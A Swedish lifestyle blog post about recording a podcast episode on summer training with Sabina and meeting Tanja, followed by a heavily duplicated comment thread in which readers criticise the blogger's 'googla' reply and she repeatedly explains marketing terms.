Poddavsnitt med Sabina och catch-up med Tanja

493A43D7-02FF-4484-91A2-602D47B19F96

Alltså mycket Sabina idag =) -Vilken lyx! 

Hon är hemma mellan alla roliga träningsresor hon är iväg på.  Idag har vi haft möte, planerat och spelat in podd.  VI började dagen, med frukost på Lifestyle kontoret. Köerna gjorde Sabina lite sen och stressad, så vi tog en kaffe i solen för att varva ner. 

010AC6F6-AF9B-43F3-ADB4-52D602E51C9B

 

Några timmar senare körde vi till MTG huset för poddinspelning.  

Där möttes jag av färska, väldoftande liljekonvaljer på bordet utanför Rix Morgonzoo. 

 99FE9876-C093-41C1-B037-127D8A19A8F5

Sedan lunch…. Kyckling till mig, lax till Sabina. 

A9CD6B6F-3D22-4850-A2D3-14D303DEEFC5 A30E7729-B3A1-474F-9A5E-4C2F7CB9F321 3BDCC7C1-61C1-4357-BA12-0F0992513D7B ED493D94-AD78-4231-84DB-2138A75A8543 D50F6AFA-3D5C-4264-8C28-4F9C39DF4B3Dproducent Mattias =)

FE65DF5E-1859-4C28-8EFA-A3DCE3186BE8 2B9AA98A-350B-437C-AF45-B576AA0B53B2

FCF631C3-D7CD-4DBA-B68A-F0F1CEA1E8F1

I dagens avsnitt pratar vi om sommarträning, in och lyssna HÄR  

Följt av en mysig catchup med Tanja =) 

DBF603A7-179F-4A8A-84CD-CB7A0AFAF8EB

 

 

 

68 Komentarer

  • Åza, jodå =) Men vi har varsin man, pendling helt i osynk, några företag på det. tonåring och Lilleman. Livet du vet ? Den typ av vänskap försvinner inte så lätt ?

 1. Hej My och grattis till jobbet!
  Jag läste din beskrivning av vad det är ni gör på Lifestyle, och blev lite konfunderad då jag inte förstod allt riktigt ?
  Vad menas med ”konvertering” här?
  ”Personlig och individuella 360 lösningar för att både få synlighet och konvertering”
  Och vad menas med ”redaktionella inslag” här?
  ”Vi erbjuder kombinerade tjänster så som både redaktionella inslag, intervjuer, expandering på nätet, kampanjer med influensers från både blogg, instagram, tv och radio bakgrund”
  Jag är lost ?
  Kram

  • Åza, jodå =) Men vi har varsin man, pendling helt i osynk, några företag på det. tonåring och Lilleman. Livet du vet 😉 Den typ av vänskap försvinner inte så lätt 😉

 2. Hej My och grattis till jobbet!

  Jag läste din beskrivning av vad det är ni gör på Lifestyle, och blev lite konfunderad då jag inte förstod allt riktigt 😛

  Vad menas med ”konvertering” här?

  ”Personlig och individuella 360 lösningar för att både få synlighet och konvertering”

  Och vad menas med ”redaktionella inslag” här?

  ”Vi erbjuder kombinerade tjänster så som både redaktionella inslag, intervjuer, expandering på nätet, kampanjer med influensers från både blogg, instagram, tv och radio bakgrund”

  Jag är lost 😛

  Kram

   • Hej My! Vilket konstigt svar på en fråga. Som VD eller annan ansvarig på ett företag tycker jag att man har skyldighet att förklara var olika begrepp står för. Att bara svara ”googla” känns inte professionellt på något sätt. Om jag får en fråga om mitt jobb eller mitt yrke seer jag det som en självklarhet att försöka att förklara på ett sätt som tydliggör frågan. Att som VD svara ”googla” känns oseriöst. Du ska ju vara ett av ansiktena utåt!
    Lycka till med ditt nya jobb, men var ödmjuk inför ditt nya uppdrag.

    • Håller med! Att googla ett lösryckt ord ger ju kanske inte alls samma förklaring eller mening som i det sammanhanget My satt ordet… Varför inte förklara vad det betyder då människor vill veta?! Är väl jättebra att fråga när man inte förstår. Och som ansiktet utåt till ett företag som arbetar med marknadsföring och PR borde tydlighet och att nå fram till läsare vara jäkligt viltigt!!

     • Charmiga Linda, som aldrig någonsin sagt något snällt här inne =) Här kommer samma kopia till dig, som till ovanstående =)
      Hej Mia! Kopierar även in svaret som jag skrivit till Susanne, till dig =)
      Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =) Ingen av er hade sagt samma sak om ni hört mig säga det, med ett leende på läpparna. Som sagt jag älskar google och fattar inte hur vi gjorde innan =)
      Mitt svar till dom övriga och förklaring på orden:
      Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!
      Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )
      Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =)
      En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =)
      Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag! kram My

     • Hej Mia! Kopierar även in svaret som jag skrivit till Susanne, till dig =)
      Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =) Ingen av er hade sagt samma sak om ni hört mig säga det, med ett leende på läpparna. Som sagt jag älskar google och fattar inte hur vi gjorde innan =)
      Mitt svar till dom övriga och förklaring på orden:
      Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!
      Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )
      Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =)
      En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =)
      Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag! kram My

   • Måste säga att det var ett väldigt märkligt svar från en VD när frågan var vad ens företag egentligen gör?

    • Hej Mia! Kopierar även in svaret som jag skrivit till Susanne, till dig =)
     Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =) Ingen av er hade sagt samma sak om ni hört mig säga det, med ett leende på läpparna. Som sagt jag älskar google och fattar inte hur vi gjorde innan =)
     Mitt svar till dom övriga och förklaring på orden:
     Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!
     Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )
     Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =)
     En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =)
     Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag! kram My

   • Nej My, det där var inget professionellt svar från en VD. Tycker att ett förtydligande på uttrycken helt är på sin plats och inget konstigt. Skulle du säga samma sak till en potentiell kund??

    • Skulle du säga samma sak till en potentiell kund?? Håller med där Katarina. När kunden frågar, svarar My, googla.
     Se oss som potentiella kunder My med den respekt som en kund ska ha. Går du nu ut med ditt nya uppdrag får man räkna med frågor. Frågor som kräver svar ur ditt perspektiv som VD. Vi är inga troll som sitter här utan nyfikna kunder som vill veta vad företaget står för och vad det har att erbjuda. Ett tips bara!

     • Måste hålla med, som ansikte utåt måste man kunna svara professionellt på alla typer av frågor utan att bli förnärmad eller tro att någon ställer de för att vara elak, nu är det frågor om ett företag du jobbar för inte dig personligen det måste man kunna skilja på.

     • Hej Mia! Kopierar även in svaret som jag skrivit till Susanne, till dig =)
      Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =) Ingen av er hade sagt samma sak om ni hört mig säga det, med ett leende på läpparna. Som sagt jag älskar google och fattar inte hur vi gjorde innan =)
      Mitt svar till dom övriga och förklaring på orden:
      Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!
      Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )
      Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =)
      En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =)
      Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag! kram My

     • Hej SOL! Nej, det skulle jag antagligen inte göra…. Kunderna är också mer medvetna om våra uttryck som rör branschen, så frågans kulle aldrig hamna där =) Här kommer svaret jag kopierar in till er alla som blivit upprörda för min google rekommendation =)
      Hej Mia! Kopierar även in svaret som jag skrivit till Susanne, till dig =)
      Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =) Ingen av er hade sagt samma sak om ni hört mig säga det, med ett leende på läpparna. Som sagt jag älskar google och fattar inte hur vi gjorde innan =)
      Mitt svar till dom övriga och förklaring på orden:
      Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!
      Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )
      Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =)
      En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =)
      Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag! kram My

  • Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =)
   Mitt svar till dom övriga och förklaring på orden:
   Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!
   Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )
   Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =) En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =) Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag!

  • Hej Ann! Fina Ann med alla härliga frågor ? mina andra jobb? Egen företagare, blogg, podd, kosttillskott, träningsresor och VD ? det räcker. Jag tycker att jag beskriver vad vi gör på lifestyle ganska bra, i både första och andra inlägget…. ☺️ Resten får du hänge med på här inne…

   • Du har inte alls svarat på vad ditt ’VD’ jobb som du kallar det innebär.
    Är det så känsligt? Jag anar nästan det.
    Jag anar också att du inte kommer jobba varannan vecka och vara men din Lilleman på Öland varannan vecka som det tydligen är sagt.
    Har jag fel?
    Kan du svara konkret?
    Om inte så förstår vi nog alla att så är fallet …

   • Hej My! Vilket konstigt svar på en fråga. Som VD eller annan ansvarig på ett företag tycker jag att man har skyldighet att förklara var olika begrepp står för. Att bara svara ”googla” känns inte professionellt på något sätt. Om jag får en fråga om mitt jobb eller mitt yrke seer jag det som en självklarhet att försöka att förklara på ett sätt som tydliggör frågan. Att som VD svara ”googla” känns oseriöst. Du ska ju vara ett av ansiktena utåt!

    Lycka till med ditt nya jobb, men var ödmjuk inför ditt nya uppdrag.

    • Håller med! Att googla ett lösryckt ord ger ju kanske inte alls samma förklaring eller mening som i det sammanhanget My satt ordet… Varför inte förklara vad det betyder då människor vill veta?! Är väl jättebra att fråga när man inte förstår. Och som ansiktet utåt till ett företag som arbetar med marknadsföring och PR borde tydlighet och att nå fram till läsare vara jäkligt viltigt!!

     • Charmiga Linda, som aldrig någonsin sagt något snällt här inne =) Här kommer samma kopia till dig, som till ovanstående =)

      Hej Mia! Kopierar även in svaret som jag skrivit till Susanne, till dig =)
      Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =) Ingen av er hade sagt samma sak om ni hört mig säga det, med ett leende på läpparna. Som sagt jag älskar google och fattar inte hur vi gjorde innan =)

      Mitt svar till dom övriga och förklaring på orden:

      Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!

      Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )

      Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =)

      En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =)
      Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag! kram My

     • Hej Mia! Kopierar även in svaret som jag skrivit till Susanne, till dig =)
      Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =) Ingen av er hade sagt samma sak om ni hört mig säga det, med ett leende på läpparna. Som sagt jag älskar google och fattar inte hur vi gjorde innan =)

      Mitt svar till dom övriga och förklaring på orden:

      Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!

      Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )

      Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =)

      En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =)
      Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag! kram My

   • Måste säga att det var ett väldigt märkligt svar från en VD när frågan var vad ens företag egentligen gör?

    • Hej Mia! Kopierar även in svaret som jag skrivit till Susanne, till dig =)
     Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =) Ingen av er hade sagt samma sak om ni hört mig säga det, med ett leende på läpparna. Som sagt jag älskar google och fattar inte hur vi gjorde innan =)

     Mitt svar till dom övriga och förklaring på orden:

     Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!

     Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )

     Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =)

     En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =)
     Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag! kram My

   • Nej My, det där var inget professionellt svar från en VD. Tycker att ett förtydligande på uttrycken helt är på sin plats och inget konstigt. Skulle du säga samma sak till en potentiell kund??

    • Skulle du säga samma sak till en potentiell kund?? Håller med där Katarina. När kunden frågar, svarar My, googla.
     Se oss som potentiella kunder My med den respekt som en kund ska ha. Går du nu ut med ditt nya uppdrag får man räkna med frågor. Frågor som kräver svar ur ditt perspektiv som VD. Vi är inga troll som sitter här utan nyfikna kunder som vill veta vad företaget står för och vad det har att erbjuda. Ett tips bara!

     • Måste hålla med, som ansikte utåt måste man kunna svara professionellt på alla typer av frågor utan att bli förnärmad eller tro att någon ställer de för att vara elak, nu är det frågor om ett företag du jobbar för inte dig personligen det måste man kunna skilja på.

     • Hej Mia! Kopierar även in svaret som jag skrivit till Susanne, till dig =)
      Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =) Ingen av er hade sagt samma sak om ni hört mig säga det, med ett leende på läpparna. Som sagt jag älskar google och fattar inte hur vi gjorde innan =)

      Mitt svar till dom övriga och förklaring på orden:

      Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!

      Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )

      Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =)

      En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =)
      Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag! kram My

     • Hej SOL! Nej, det skulle jag antagligen inte göra…. Kunderna är också mer medvetna om våra uttryck som rör branschen, så frågans kulle aldrig hamna där =) Här kommer svaret jag kopierar in till er alla som blivit upprörda för min google rekommendation =)
      Hej Mia! Kopierar även in svaret som jag skrivit till Susanne, till dig =)
      Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =) Ingen av er hade sagt samma sak om ni hört mig säga det, med ett leende på läpparna. Som sagt jag älskar google och fattar inte hur vi gjorde innan =)

      Mitt svar till dom övriga och förklaring på orden:

      Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!

      Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )

      Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =)

      En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =)
      Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag! kram My

  • Hej Susanne! Nu var det många som tolkade mitt svar att du kunde googla som något elakt eller negativt. Det var en smiley från min sida och inte alls menat så! Det vanligaste missförståndet när man skriver och inte hör/ser varandra =)

   Mitt svar till dom övriga och förklaring på orden:

